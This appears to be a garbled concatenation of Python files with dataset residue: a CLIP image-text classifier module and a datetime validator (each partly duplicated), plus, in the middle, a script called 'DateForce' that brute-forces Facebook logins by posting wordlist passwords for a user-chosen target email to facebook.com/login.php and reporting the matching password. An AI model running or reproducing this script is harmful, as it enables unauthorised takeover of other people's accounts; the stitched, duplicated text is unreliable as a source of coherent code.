        logits = self.head(features)
        return {
            LOGITS: logits,
            FEATURES: features,
        }

    def get_layer_ids(self):
        """
        Assign an id to each layer. Layer ids will be used in layer-wise lr decay.
        Basically, id gradually increases when going from the output end to
        the input end. The layers defined in this class, e.g., head, have id 0.

        Returns
        -------
        A dictionary mapping the layer names (keys) to their ids (values).
        """
        model_prefixes = ["model.text_model", "model.vision_model", "model"]
        # later model prefixes can't starts with the early ones
        for i, model_pre in enumerate(model_prefixes):
            for model_pre2 in model_prefixes[i + 1:]:
                if model_pre2.startswith(model_pre):
                    raise ValueError(
                        f"{model_pre} is a substring of {model_pre2}. "
                        f"Need to swap them in {model_prefixes}."
                    )
        pre_encoder_patterns = ("embeddings", "pre")
        post_encoder_patterns = ("head", "final", "post", "logit", "project")
        names = [n for n, _ in self.named_parameters()]
        name_to_id = {}
        for per_prefix in model_prefixes:
            per_model_name_to_id, names = assign_layer_ids(
                names=names,
                pre_encoder_patterns=pre_encoder_patterns,
                post_encoder_patterns=post_encoder_patterns,
                model_pre=per_prefix,
            )
            name_to_id.update(per_model_name_to_id)
        if len(names) > 0:
            logger.debug(f"outer layers are treated as head: {names}")
        for n in names:
            assert n not in name_to_id
            name_to_id[n] = 0
        # The corrupted source fused dataset residue onto this line
        # ("return name_to_id | text/src/..."); restore the plain return.
        return name_to_id
import logging
from torch import nn
from transformers import CLIPModel
from .utils import assign_layer_ids
from ..constants import (
IMAGE, IMAGE_VALID_NUM, TEXT_TOKEN_IDS,
TEXT_VALID_LENGTH, LABEL, LOGITS, FEATURES, AUTOMM
)
from typing import Optional
from .utils import init_weights
logger = logging.getLogger(AUTOMM)
class CLIPForImageText(nn.Module):
"""
Support the CLIP model.
Refer to https://huggingface.co/docs/transformers/model_doc/clip
"""
def __init__(
self,
prefix: str,
checkpoint_name: str,
num_classes: Optional[int] = 0,
):
"""
Load the pretrained CLIP from huggingface transformers.
Parameters
----------
prefix
The model prefix.
checkpoint_name
Name of the checkpoint.
num_classes
The number of classes. 1 for a regression task.
"""
logger.debug(f"initializing {prefix}")
super().__init__()
self.model = CLIPModel.from_pretrained(checkpoint_name)
self.out_features = self.model.config.projection_dim
self.head = nn.Linear(self.out_features, num_classes) if num_classes > 0 else nn.Identity()
self.head.apply(init_weights)
self.text_token_ids_key = f"{prefix}_{TEXT_TOKEN_IDS}"
self.text_valid_length_key = f"{prefix}_{TEXT_VALID_LENGTH}"
self.image_key = f"{prefix}_{IMAGE}"
self.image_valid_num_key = f"{prefix}_{IMAGE_VALID_NUM}"
self.label_key = f"{prefix}_{LABEL}"
self.name_to_id = self.get_layer_ids()
self.head_layer_names = [n for n, layer_id in self.name_to_id.items() if layer_id == 0]
def forward(
self,
batch: dict,
):
"""
Parameters
----------
batch
A dictionary containing the input mini-batch data.
We need to use the keys with the model prefix to index required data.
Returns
-------
A dictionary with logits and features.
"""
text_token_ids = batch[self.text_token_ids_key]
text_valid_length = batch[self.text_valid_length_key]
images = batch[self.image_key]
image_valid_num = batch[self.image_valid_num_key]
steps = torch.arange(0, text_token_ids.shape[1]).type_as(text_valid_length)
text_masks = (steps.reshape((1, -1)) < text_valid_length.reshape((-1, 1))).type_as(text_token_ids)
assert torch.equal(text_valid_length, text_masks.sum(dim=-1))
assert images.dim() == 5
b, n, c, h, w = images.shape
image_features = self.model.get_image_features(
pixel_values=images.reshape((b * n, c, h, w)),
)
steps = torch.arange(0, n).type_as(image_valid_num)
image_masks = (steps.reshape((1, -1)) < image_valid_num.reshape((-1, 1))).type_as(image_features) # (b, n)
image_features = image_features.reshape((b, n, -1)) * image_masks[:, :, None] # (b, n, num_features)
image_features = image_features.sum(dim=1) # (b, num_features)
text_features = self.model.get_text_features(
input_ids=text_token_ids,
attention_mask=text_masks,
)
# Here we add up the text and image embeddings
features = image_features + text_features
logits = self.head(features)
return {
LOGITS: logits,
FEATURES: features,
}
def get_layer_ids(self,):
"""
Assign an id to each layer. Layer ids will be used in layer-wise lr decay.
Basically, id gradually increases when going from the output end to
the input end. The layers defined in this class, e.g., head, have id 0.
Returns
-------
A dictionary mapping the layer names (keys) to their ids (values).
"""
model_prefixes = ["model.text_model", "model.vision_model", "model"]
# later model prefixes can't starts with the early ones
for i, model_pre in enumerate(model_prefixes):
for model_pre2 in model_prefixes[i+1:]:
if model_pre2.startswith(model_pre):
raise ValueError(
f"{model_pre} is a substring of {model_pre2}. "
f"Need to swap them in {model_prefixes}."
)
pre_encoder_patterns = ("embeddings", "pre")
post_encoder_patterns = ("head", "final", "post", "logit", "project")
names = [n for n, _ in self.named_parameters()]
name_to_id = {}
for per_prefix in model_prefixes:
per_model_name_to_id, names = assign_layer_ids(
names=names,
pre_encoder_patterns=pre_encoder_patterns,
post_encoder_patterns=post_encoder_patterns,
model_pre=per_prefix,
)
name_to_id.update(per_model_name_to_id)
if len(names) > 0:
logger.debug(f"outer layers are treated as head: {names}")
for n in names:
assert n not in name_to_id
name_to_id[n] = 0
return name_to_id | 0.922308 | 0.423756 |
import os.path
import requests
from bs4 import BeautifulSoup
import sys
if sys.version_info[0] != 3:
print('''\t--------------------------------------\n\t\tREQUIRED PYTHON 3.x\n\t\tinstall and try: python3
fb.py\n\t--------------------------------------''')
sys.exit()
PASSWORD_FILE = "<PASSWORD>.<PASSWORD>"
MIN_PASSWORD_LENGTH = 6
POST_URL = 'https://www.facebook.com/login.php'
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
}
PAYLOAD = {}
COOKIES = {}
def create_form():
form = dict()
cookies = {'fr': '0ZvhC3YwYm63ZZat1..Ba0Ipu.Io.AAA.0.0.Ba0Ipu.AWUPqDLy'}
data = requests.get(POST_URL, headers=HEADERS)
for i in data.cookies:
cookies[i.name] = i.value
data = BeautifulSoup(data.text, 'html.parser').form
if data.input['name'] == 'lsd':
form['lsd'] = data.input['value']
return form, cookies
def is_this_a_password(email, index, password):
global PAYLOAD, COOKIES
if index % 10 == 0:
PAYLOAD, COOKIES = create_form()
PAYLOAD['email'] = email
PAYLOAD['pass'] = password
r = requests.post(POST_URL, data=PAYLOAD, cookies=COOKIES, headers=HEADERS)
if 'Find Friends' in r.text or 'security code' in r.text or 'Two-factor authentication' in r.text or "Log Out" in r.text:
open('temp', 'w').write(str(r.content))
print('\nPassword found is: ', password)
return True
return False
if __name__ == "__main__":
print('\n---------- Welcome To DateForce ----------\n')
if not os.path.isfile(PASSWORD_FILE):
print("Password file is not exist: ", PASSWORD_FILE)
sys.exit(0)
password_data = open(PASSWORD_FILE, 'r').read().split("\n")
print("Password file selected: ", PASSWORD_FILE)
email = input('Enter Email/Username to target: ').strip()
for index, password in zip(range(password_data.__len__()), password_data):
password = <PASSWORD>()
if len(password) < MIN_PASSWORD_LENGTH:
continue
print("Trying password [", index, "]: ", password)
if is_this_a_password(email, index, password):
break | fb-1.py | import os.path
import requests
from bs4 import BeautifulSoup
import sys
if sys.version_info[0] != 3:
print('''\t--------------------------------------\n\t\tREQUIRED PYTHON 3.x\n\t\tinstall and try: python3
fb.py\n\t--------------------------------------''')
sys.exit()
PASSWORD_FILE = "<PASSWORD>.<PASSWORD>"
MIN_PASSWORD_LENGTH = 6
POST_URL = 'https://www.facebook.com/login.php'
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
}
PAYLOAD = {}
COOKIES = {}
def create_form():
form = dict()
cookies = {'fr': '0ZvhC3YwYm63ZZat1..Ba0Ipu.Io.AAA.0.0.Ba0Ipu.AWUPqDLy'}
data = requests.get(POST_URL, headers=HEADERS)
for i in data.cookies:
cookies[i.name] = i.value
data = BeautifulSoup(data.text, 'html.parser').form
if data.input['name'] == 'lsd':
form['lsd'] = data.input['value']
return form, cookies
def is_this_a_password(email, index, password):
global PAYLOAD, COOKIES
if index % 10 == 0:
PAYLOAD, COOKIES = create_form()
PAYLOAD['email'] = email
PAYLOAD['pass'] = password
r = requests.post(POST_URL, data=PAYLOAD, cookies=COOKIES, headers=HEADERS)
if 'Find Friends' in r.text or 'security code' in r.text or 'Two-factor authentication' in r.text or "Log Out" in r.text:
open('temp', 'w').write(str(r.content))
print('\nPassword found is: ', password)
return True
return False
if __name__ == "__main__":
print('\n---------- Welcome To DateForce ----------\n')
if not os.path.isfile(PASSWORD_FILE):
print("Password file is not exist: ", PASSWORD_FILE)
sys.exit(0)
password_data = open(PASSWORD_FILE, 'r').read().split("\n")
print("Password file selected: ", PASSWORD_FILE)
email = input('Enter Email/Username to target: ').strip()
for index, password in zip(range(password_data.__len__()), password_data):
password = <PASSWORD>()
if len(password) < MIN_PASSWORD_LENGTH:
continue
print("Trying password [", index, "]: ", password)
if is_this_a_password(email, index, password):
break | 0.087815 | 0.071494 |
from datetime import datetime, tzinfo
from enum import Enum
import re
from typing import Any, Optional
from .string_validator import StringValidator
from validataclass.exceptions import InvalidDateTimeError, InvalidValidatorOptionException, DateTimeRangeError
from validataclass.helpers.datetime_range import BaseDateTimeRange
__all__ = [
'DateTimeFormat',
'DateTimeValidator',
]
# Helper variables to construct more complex regex patterns
_REGEX_DATE = r'(\d{4}-\d{2}-\d{2})'
_REGEX_TIME = r'(\d{2}:\d{2}:\d{2}(\.\d{3}(\d{3})?)?)'
_REGEX_TIMEZONE = r'(Z|[+-]\d{2}:\d{2})'
_REGEX_UTC_ONLY = r'(Z|[+-]00:00)'
_REGEX_DATE_AND_TIME = f'{_REGEX_DATE}T{_REGEX_TIME}'


class DateTimeFormat(Enum):
    """
    Enum to specify allowed datetime format (e.g. with/without timezone info).

    Enum members have two properties:

    - format_str: String representation used in InvalidDateTimeError (e.g. "<DATE>T<TIME>[<TIMEZONE>]")
    - regex_str: Regular expression pattern as string
    """

    def __init__(self, format_str, regex_str):
        # Each member is declared as a (format_str, regex_str) tuple; Enum
        # calls __init__ with the tuple unpacked into these two fields.
        self.format_str = format_str
        self.regex_str = regex_str

    def allows_local(self) -> bool:
        """ Returns True if the format allows local datetimes (i.e. datetime strings without timezone info). """
        # Membership testing already yields a bool; the previous
        # "True if ... else False" ternary was redundant.
        return self in (self.ALLOW_TIMEZONE, self.LOCAL_ONLY, self.LOCAL_OR_UTC)

    # Allows datetimes both with and without timezone info, the latter being interpreted as local time (default)
    ALLOW_TIMEZONE = ('<DATE>T<TIME>[<TIMEZONE>]', f'{_REGEX_DATE_AND_TIME}{_REGEX_TIMEZONE}?')

    # Only allows datetimes with timezone info ('Z' suffix for UTC or any '[+-]HH:MM...' timezone)
    REQUIRE_TIMEZONE = ('<DATE>T<TIME><TIMEZONE>', f'{_REGEX_DATE_AND_TIME}{_REGEX_TIMEZONE}')

    # Only allows datetimes in UTC with explicit timezone info ('Z' or '+00:00' suffix)
    REQUIRE_UTC = ('<DATE>T<TIME>Z', f'{_REGEX_DATE_AND_TIME}{_REGEX_UTC_ONLY}')

    # Only allows datetimes without timezone info (will be interpreted as local time)
    LOCAL_ONLY = ('<DATE>T<TIME>', f'{_REGEX_DATE_AND_TIME}')

    # Allows datetimes without timezone info (as local time) and datetimes in UTC ('Z' or '+00:00'), but no other timezones
    LOCAL_OR_UTC = ('<DATE>T<TIME>[Z]', f'{_REGEX_DATE_AND_TIME}{_REGEX_UTC_ONLY}?')
class DateTimeValidator(StringValidator):
    """
    Validator that parses datetime strings in the ISO 8601 compatible format "YYYY-MM-DDTHH:MM:SS[.fff[fff][+HH:MM]" to `datetime.datetime`
    objects, where "T" stands for the literal character as a separator between date and time (e.g. "2021-12-31T12:34:56" or
    "2021-12-31T12:34:56.123456").

    The string may specify a timezone using "+HH:MM" or "-HH:MM". Also the special suffix "Z" is allowed to denote UTC as the timezone
    (e.g. "2021-12-31T12:34:56Z" which is equivalent to "2021-12-31T12:34:56+00:00"). If no timezone is specified, the datetime is
    interpreted as local time (see also the parameter 'local_timezone').

    By default the validator allows datetimes with and without timezones. To restrict this to specific formats you can use the
    `DateTimeFormat` enum, which has the following values:

    - ALLOW_TIMEZONE: Default behavior, allows datetimes with any timezone or without a timezone (local time)
    - REQUIRE_TIMEZONE: Only allows datetimes that specify a timezone (but any timezone is allowed)
    - REQUIRE_UTC: Only allows datetimes that explicitly specify UTC as timezone (either with "Z" or "+00:00")
    - LOCAL_ONLY: Only allows datetimes WITHOUT timezone (will be interpreted as local time)
    - LOCAL_OR_UTC: Only allows local datetimes (no timezone) or UTC datetimes (explicitly specified with "Z" or "+00:00")

    ```
    Example input             | ALLOW_TIMEZONE | REQUIRE_TIMEZONE | REQUIRE_UTC | LOCAL_ONLY | LOCAL_OR_UTC
    --------------------------|----------------|------------------|-------------|------------|-------------
    2021-12-31T12:34:56       | valid          |                  |             | valid      | valid
    2021-12-31T12:34:56Z      | valid          | valid            | valid       |            | valid
    2021-12-31T12:34:56+00:00 | valid          | valid            | valid       |            | valid
    2021-12-31T12:34:56+02:00 | valid          | valid            |             |            |
    ```

    The parameter 'local_timezone' can be used to set the timezone for datetime strings that don't specify a timezone. For example, if
    'local_timezone' is set to a UTC+3 timezone, the string "2021-12-31T12:34:56" will be treated like "2021-12-31T12:34:56+03:00".
    Similarly, to interpret datetimes without timezone as UTC, set `local_timezone=datetime.timezone.utc`. If 'local_timezone' is not
    set (which is the default), the resulting datetime will have no timezone info (`tzinfo=None`).

    The parameter 'target_timezone' can be used to convert all resulting datetime objects to a uniform timezone. This requires the
    datetimes to already have a timezone, so to allow local datetimes (without timezone info in the input string) you need to specify
    'local_timezone' as well.

    See `datetime.timezone` and `dateutil.tz` (https://dateutil.readthedocs.io/en/stable/tz.html) for information on defining timezones.

    Additionally the parameter 'datetime_range' can be used to specify a range of datetime values that are allowed (e.g. a minimum and
    a maximum datetime, which can be dynamically defined using callables). See the classes `DateTimeRange` and `DateTimeOffsetRange`
    from `validataclass.helpers.datetime_range` for further information.

    Note: When using datetime ranges, make sure not to mix datetimes that have timezones with local datetimes because those comparisons
    will raise `TypeError` exceptions. It's recommended either to use only datetimes with defined timezones (for both input values and
    the boundaries of the datetime ranges), or to specify the 'local_timezone' parameter (which will also be used to determine the
    timezone of the range boundary datetimes if they do not specify timezones themselves).

    Examples:

    ```
    # Use `dateutil.tz` to easily specify timezones apart from UTC
    from dateutil import tz

    # Validate datetimes with and without timezone
    # "2021-12-31T12:34:56" -> datetime(2021, 12, 31, 12, 34, 56)
    # "2021-12-31T12:34:56+02:00" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone(timedelta(hours=2)))
    DateTimeValidator()

    # Only allow datetimes with specified timezone
    # "2021-12-31T12:34:56+02:00" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone(timedelta(hours=2)))
    DateTimeValidator(DateTimeFormat.REQUIRE_TIMEZONE)

    # Only allow datetimes either without timezone (local time) or with UTC explicitly specified ('Z' or '+00:00' suffix)
    # "2021-12-31T12:34:56" -> datetime(2021, 12, 31, 12, 34, 56)
    # "2021-12-31T12:34:56Z" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone.utc)
    DateTimeValidator(DateTimeFormat.LOCAL_OR_UTC)

    # As above (local time or UTC), but set a local_timezone as the default value for the datetime's tzinfo
    # "2021-12-31T12:34:56" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=tz.gettz('Europe/Berlin'))
    # "2021-12-31T12:34:56Z" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone.utc)
    DateTimeValidator(DateTimeFormat.LOCAL_OR_UTC, local_timezone=tz.gettz('Europe/Berlin'))

    # Allow datetime strings with and without timezone (using CET/CEST (+01:00/+02:00) as default), but convert all datetimes to UTC
    # "2021-12-31T12:34:56" -> datetime(2021, 12, 31, 11, 34, 56, tzinfo=timezone.utc) (input interpreted as UTC+01:00)
    # "2021-12-31T12:34:56Z" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone.utc) (unchanged because it's already UTC)
    # "2021-12-31T12:34:56-06:00" -> datetime(2021, 12, 31, 18, 34, 56, tzinfo=timezone.utc)
    DateTimeValidator(local_timezone=tz.gettz('Europe/Berlin'), target_timezone=timezone.utc)
    ```

    Examples for datetime ranges:

    ```
    from validataclass.helpers import DateTimeRange, DateTimeOffsetRange

    # Only allow datetimes within a specified datetime range, e.g. allow all datetimes in the year 2021
    DateTimeValidator(local_timezone=timezone.utc, datetime_range=DateTimeRange(
        datetime(2021, 1, 1, 0, 0, 0, tzinfo=timezone.utc),
        datetime(2021, 12, 31, 23, 59, 59, 999999, tzinfo=timezone.utc)
    ))

    # Specify a datetime range using a pivot datetime and two offsets (allows all datetimes "around" some datetime plus/minus offsets),
    # e.g. all datetimes between pivot_datetime - 5 minutes and pivot_datetime + 10 minutes:
    DateTimeValidator(local_timezone=timezone.utc, datetime_range=DateTimeOffsetRange(
        pivot=datetime(2021, 5, 25, 12, 0, 0, tzinfo=timezone.utc),
        offset_minus=timedelta(minutes=5),
        offset_plus=timedelta(minutes=10)
    ))

    # The pivot can also be a callable (which will be evaluated just when the validator is called), or undefined, in which case it
    # defaults to the current time (in UTC and without milliseconds), e.g. to only allow all datetimes in the next 2 weeks:
    DateTimeValidator(local_timezone=timezone.utc, datetime_range=DateTimeOffsetRange(offset_plus=timedelta(weeks=2)))
    ```

    See also: `DateValidator`, `TimeValidator`

    Valid input: Datetime strings in the format specified above as `str`
    Output: `datetime.datetime`
    """

    # Datetime string format (enum)
    datetime_format: DateTimeFormat

    # Precompiled regular expression for the specified datetime string format
    datetime_format_regex: re.Pattern

    # Timezone to use for datetime strings without a specified timezone (None: no default timezone info in datetime)
    local_timezone: Optional[tzinfo] = None

    # Target timezone that all datetimes will be converted to (None: no timezone conversion)
    target_timezone: Optional[tzinfo] = None

    # Datetime range that defines which values are allowed
    datetime_range: Optional[BaseDateTimeRange] = None

    def __init__(
        self,
        datetime_format: DateTimeFormat = DateTimeFormat.ALLOW_TIMEZONE,
        *,
        local_timezone: Optional[tzinfo] = None,
        target_timezone: Optional[tzinfo] = None,
        datetime_range: Optional[BaseDateTimeRange] = None,
    ):
        """
        Create a `DateTimeValidator` with a specified datetime string format, optionally a local timezone, a target timezone and/or
        a datetime range.

        If a target timezone is specified and a format that allows local datetimes is used (ALLOW_TIMEZONE, LOCAL_ONLY or LOCAL_OR_UTC),
        the parameter "local_timezone" is required (otherwise it would be unclear how to interpret and convert local datetimes).

        To define datetime ranges using the "datetime_range" parameter, see the classes `DateTimeRange` and `DateTimeOffsetRange` from
        `validataclass.helpers.datetime_range`.

        Parameters:
            datetime_format: `DateTimeFormat`, specifies the accepted string formats (default: `ALLOW_TIMEZONE`)
            local_timezone: `tzinfo`, specifies the default timezone to set for datetime strings without timezone info (default: None)
            target_timezone: `tzinfo`, if specified, all datetimes will be converted to this timezone (default: None)
            datetime_range: `BaseDateTimeRange` (subclasses), specifies the range of allowed values (default: None)

        Raises:
            InvalidValidatorOptionException: if 'target_timezone' is set and the format allows local datetimes, but no
                'local_timezone' was given (local inputs could not be converted unambiguously otherwise)
        """
        # Initialize StringValidator without any parameters
        super().__init__()

        # Check parameter validity: conversion of a local datetime to the target timezone needs a known source timezone
        if target_timezone is not None and datetime_format.allows_local() and local_timezone is None:
            raise InvalidValidatorOptionException('Parameter "local_timezone" is required when a datetime format that allows local '
                                                  'datetimes is used and "target_timezone" is specified.')

        # Save parameters
        self.datetime_format = datetime_format
        self.local_timezone = local_timezone
        self.target_timezone = target_timezone
        self.datetime_range = datetime_range

        # Precompile regular expression for datetime format
        self.datetime_format_regex = re.compile(self.datetime_format.regex_str)

    def validate(self, input_data: Any) -> datetime:
        """
        Validate input as a valid datetime string and convert it to a `datetime.datetime` object.

        Raises `InvalidDateTimeError` if the string does not match the configured format or cannot be parsed, and
        `DateTimeRangeError` if the value falls outside the configured datetime range.
        """
        # First, validate input data as string
        datetime_string = super().validate(input_data)

        # Validate string format with a regular expression (fullmatch, so no extra characters are tolerated)
        if not self.datetime_format_regex.fullmatch(datetime_string):
            raise InvalidDateTimeError(datetime_format_str=self.datetime_format.format_str)

        # Replace 'Z' suffix to make the string compatible with fromisoformat(), which (before Python 3.11)
        # does not understand the 'Z' designator
        if datetime_string.endswith('Z'):
            datetime_string = datetime_string[:-1] + '+00:00'

        # Try to create datetime object from string (accepts a certain subset of ISO 8601 datetime strings)
        try:
            datetime_obj = datetime.fromisoformat(datetime_string)
        except ValueError as e:
            # Chain the original parsing error so debugging output shows why fromisoformat() rejected the string
            raise InvalidDateTimeError(datetime_format_str=self.datetime_format.format_str) from e

        # Set timezone to local_timezone if no timezone is specified
        if datetime_obj.tzinfo is None and self.local_timezone is not None:
            datetime_obj = datetime_obj.replace(tzinfo=self.local_timezone)

        # Check datetime against datetime_range (if defined)
        if self.datetime_range is not None and not self.datetime_range.contains_datetime(datetime_obj, self.local_timezone):
            # Add extra fields (lower_boundary, upper_boundary) to the validation error
            raise DateTimeRangeError(**self.datetime_range.to_dict(self.local_timezone))

        # Convert datetime to target timezone (if defined)
        if self.target_timezone is not None:
            datetime_obj = datetime_obj.astimezone(self.target_timezone)

        return datetime_obj
from enum import Enum
import re
from typing import Any, Optional
from .string_validator import StringValidator
from validataclass.exceptions import InvalidDateTimeError, InvalidValidatorOptionException, DateTimeRangeError
from validataclass.helpers.datetime_range import BaseDateTimeRange
__all__ = [
'DateTimeFormat',
'DateTimeValidator',
]
# Helper variables to construct more complex regex patterns
_REGEX_DATE = r'(\d{4}-\d{2}-\d{2})'
_REGEX_TIME = r'(\d{2}:\d{2}:\d{2}(\.\d{3}(\d{3})?)?)'
_REGEX_TIMEZONE = r'(Z|[+-]\d{2}:\d{2})'
_REGEX_UTC_ONLY = r'(Z|[+-]00:00)'
_REGEX_DATE_AND_TIME = f'{_REGEX_DATE}T{_REGEX_TIME}'
class DateTimeFormat(Enum):
"""
Enum to specify allowed datetime format (e.g. with/without timezone info).
Enum members have two properties:
- format_str: String representation used in InvalidDateTimeError (e.g. "<DATE>T<TIME>[<TIMEZONE>]")
- regex_str: Regular expression pattern as string
"""
def __init__(self, format_str, regex_str):
self.format_str = format_str
self.regex_str = regex_str
def allows_local(self) -> bool:
""" Returns True if the format allows local datetimes (i.e. datetime strings without timezone info). """
return True if self in [self.ALLOW_TIMEZONE, self.LOCAL_ONLY, self.LOCAL_OR_UTC] else False
# Allows datetimes both with and without timezone info, the latter being interpreted as local time (default)
ALLOW_TIMEZONE = ('<DATE>T<TIME>[<TIMEZONE>]', f'{_REGEX_DATE_AND_TIME}{_REGEX_TIMEZONE}?')
# Only allows datetimes with timezone info ('Z' suffix for UTC or any '[+-]HH:MM...' timezone)
REQUIRE_TIMEZONE = ('<DATE>T<TIME><TIMEZONE>', f'{_REGEX_DATE_AND_TIME}{_REGEX_TIMEZONE}')
# Only allows datetimes in UTC with explicit timezone info ('Z' or '+00:00' suffix)
REQUIRE_UTC = ('<DATE>T<TIME>Z', f'{_REGEX_DATE_AND_TIME}{_REGEX_UTC_ONLY}')
# Only allows datetimes without timezone info (will be interpreted as local time)
LOCAL_ONLY = ('<DATE>T<TIME>', f'{_REGEX_DATE_AND_TIME}')
# Allows datetimes without timezone info (as local time) and datetimes in UTC ('Z' or '+00:00'), but no other timezones
LOCAL_OR_UTC = ('<DATE>T<TIME>[Z]', f'{_REGEX_DATE_AND_TIME}{_REGEX_UTC_ONLY}?')
class DateTimeValidator(StringValidator):
"""
Validator that parses datetime strings in the ISO 8601 compatible format "YYYY-MM-DDTHH:MM:SS[.fff[fff][+HH:MM]" to `datetime.datetime`
objects, where "T" stands for the literal character as a separator between date and time (e.g. "2021-12-31T12:34:56" or
"2021-12-31T12:34:56.123456").
The string may specify a timezone using "+HH:MM" or "-HH:MM". Also the special suffix "Z" is allowed to denote UTC as the timezone
(e.g. "2021-12-31T12:34:56Z" which is equivalent to "2021-12-31T12:34:56+00:00"). If no timezone is specified, the datetime is
interpreted as local time (see also the parameter 'local_timezone').
By default the validator allows datetimes with and without timezones. To restrict this to specific formats you can use the
`DateTimeFormat` enum, which has the following values:
- ALLOW_TIMEZONE: Default behavior, allows datetimes with any timezone or without a timezone (local time)
- REQUIRE_TIMEZONE: Only allows datetimes that specify a timezone (but any timezone is allowed)
- REQUIRE_UTC: Only allows datetimes that explicitly specify UTC as timezone (either with "Z" or "+00:00")
- LOCAL_ONLY: Only allows datetimes WITHOUT timezone (will be interpreted as local time)
- LOCAL_OR_UTC: Only allows local datetimes (no timezone) or UTC datetimes (explicitly specified with "Z" or "+00:00")
```
Example input | ALLOW_TIMEZONE | REQUIRE_TIMEZONE | REQUIRE_UTC | LOCAL_ONLY | LOCAL_OR_UTC
--------------------------|----------------|------------------|-------------|------------|-------------
2021-12-31T12:34:56 | valid | | | valid | valid
2021-12-31T12:34:56Z | valid | valid | valid | | valid
2021-12-31T12:34:56+00:00 | valid | valid | valid | | valid
2021-12-31T12:34:56+02:00 | valid | valid | | |
```
The parameter 'local_timezone' can be used to set the timezone for datetime strings that don't specify a timezone. For example, if
'local_timezone' is set to a UTC+3 timezone, the string "2021-12-31T12:34:56" will be treated like "2021-12-31T12:34:56+03:00".
Similarly, to interpret datetimes without timezone as UTC, set `local_timezone=datetime.timezone.utc`. If 'local_timezone' is not
set (which is the default), the resulting datetime will have no timezone info (`tzinfo=None`).
The parameter 'target_timezone' can be used to convert all resulting datetime objects to a uniform timezone. This requires the
datetimes to already have a timezone, so to allow local datetimes (without timezone info in the input string) you need to specify
'local_timezone' as well.
See `datetime.timezone` and `dateutil.tz` (https://dateutil.readthedocs.io/en/stable/tz.html) for information on defining timezones.
Additionally the parameter 'datetime_range' can be used to specify a range of datetime values that are allowed (e.g. a minimum and
a maximum datetime, which can be dynamically defined using callables). See the classes `DateTimeRange` and `DateTimeOffsetRange`
from `validataclass.helpers.datetime_range` for further information.
Note: When using datetime ranges, make sure not to mix datetimes that have timezones with local datetimes because those comparisons
will raise `TypeError` exceptions. It's recommended either to use only datetimes with defined timezones (for both input values and
the boundaries of the datetime ranges), or to specify the 'local_timezone' parameter (which will also be used to determine the
timezone of the range boundary datetimes if they do not specify timezones themselves).
Examples:
```
# Use `dateutil.tz` to easily specify timezones apart from UTC
from dateutil import tz
# Validate datetimes with and without timezone
# "2021-12-31T12:34:56" -> datetime(2021, 12, 31, 12, 34, 56)
# "2021-12-31T12:34:56+02:00" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone(timedelta(hours=2)))
DateTimeValidator()
# Only allow datetimes with specified timezone
# "2021-12-31T12:34:56+02:00" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone(timedelta(hours=2)))
DateTimeValidator(DateTimeFormat.REQUIRE_TIMEZONE)
# Only allow datetimes either without timezone (local time) or with UTC explicitly specified ('Z' or '+00:00' suffix)
# "2021-12-31T12:34:56" -> datetime(2021, 12, 31, 12, 34, 56)
# "2021-12-31T12:34:56Z" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone.utc)
DateTimeValidator(DateTimeFormat.LOCAL_OR_UTC)
# As above (local time or UTC), but set a local_timezone as the default value for the datetime's tzinfo
# "2021-12-31T12:34:56" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=tz.gettz('Europe/Berlin'))
# "2021-12-31T12:34:56Z" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone.utc)
DateTimeValidator(DateTimeFormat.LOCAL_OR_UTC, local_timezone=tz.gettz('Europe/Berlin'))
# Allow datetime strings with and without timezone (using CET/CEST (+01:00/+02:00) as default), but convert all datetimes to UTC
# "2021-12-31T12:34:56" -> datetime(2021, 12, 31, 11, 34, 56, tzinfo=timezone.utc) (input interpreted as UTC+01:00)
# "2021-12-31T12:34:56Z" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone.utc) (unchanged because it's already UTC)
# "2021-12-31T12:34:56-06:00" -> datetime(2021, 12, 31, 18, 34, 56, tzinfo=timezone.utc)
DateTimeValidator(local_timezone=tz.gettz('Europe/Berlin'), target_timezone=timezone.utc)
```
Examples for datetime ranges:
```
from validataclass.helpers import DateTimeRange, DateTimeOffsetRange
# Only allow datetimes within a specified datetime range, e.g. allow all datetimes in the year 2021
DateTimeValidator(local_timezone=timezone.utc, datetime_range=DateTimeRange(
datetime(2021, 1, 1, 0, 0, 0, tzinfo=timezone.utc),
datetime(2021, 12, 31, 23, 59, 59, 999999, tzinfo=timezone.utc)
))
# Specify a datetime range using a pivot datetime and two offsets (allows all datetimes "around" some datetime plus/minus offsets),
# e.g. all datetimes between pivot_datetime - 5 minutes and pivot_datetime + 10 minutes:
DateTimeValidator(local_timezone=timezone.utc, datetime_range=DateTimeOffsetRange(
pivot=datetime(2021, 5, 25, 12, 0, 0, tzinfo=timezone.utc),
offset_minus=timedelta(minutes=5),
offset_plus=timedelta(minutes=10)
))
# The pivot can also be a callable (which will be evaluated just when the validator is called), or undefined, in which case it
# defaults to the current time (in UTC and without milliseconds), e.g. to only allow all datetimes in the next 2 weeks:
DateTimeValidator(local_timezone=timezone.utc, datetime_range=DateTimeOffsetRange(offset_plus=timedelta(weeks=2)))
```
See also: `DateValidator`, `TimeValidator`
Valid input: Datetime strings in the format specified above as `str`
Output: `datetime.datetime`
"""
# Datetime string format (enum)
datetime_format: DateTimeFormat
# Precompiled regular expression for the specified datetime string format
datetime_format_regex: re.Pattern
# Timezone to use for datetime strings without a specified timezone (None: no default timezone info in datetime)
local_timezone: Optional[tzinfo] = None
# Target timezone that all datetimes will be converted to (None: no timezone conversion)
target_timezone: Optional[tzinfo] = None
# Datetime range that defines which values are allowed
datetime_range: Optional[BaseDateTimeRange] = None
def __init__(
self,
